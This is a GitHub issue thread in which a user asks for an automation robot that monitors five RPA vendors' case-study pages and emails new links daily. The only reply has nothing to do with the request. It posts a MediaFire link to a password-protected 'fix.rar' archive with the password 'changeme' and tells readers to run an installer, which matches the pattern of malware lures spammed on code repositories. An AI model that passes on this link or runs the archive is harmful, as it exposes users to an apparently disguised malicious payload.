### ISSUE TITLE
Build a robot exploring RPA use cases

### ISSUE THREAD

**Issue by AlexisxCapto** [Capto-Company/Automation-Explorer#1]
The robot should run every morning and send an email with the link to any new post on those pages.

Here is a list of link:
https://www.automationanywhere.com/resources/customer-stories
https://www.uipath.com/resources/automation-case-studies
https://www.pega.com/customers
https://www.tungstenautomation.com/learn/case-studies?sortBy=relevance&sortOrder=asc
https://www.blueprism.com/resources/?&category=caseStudies

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
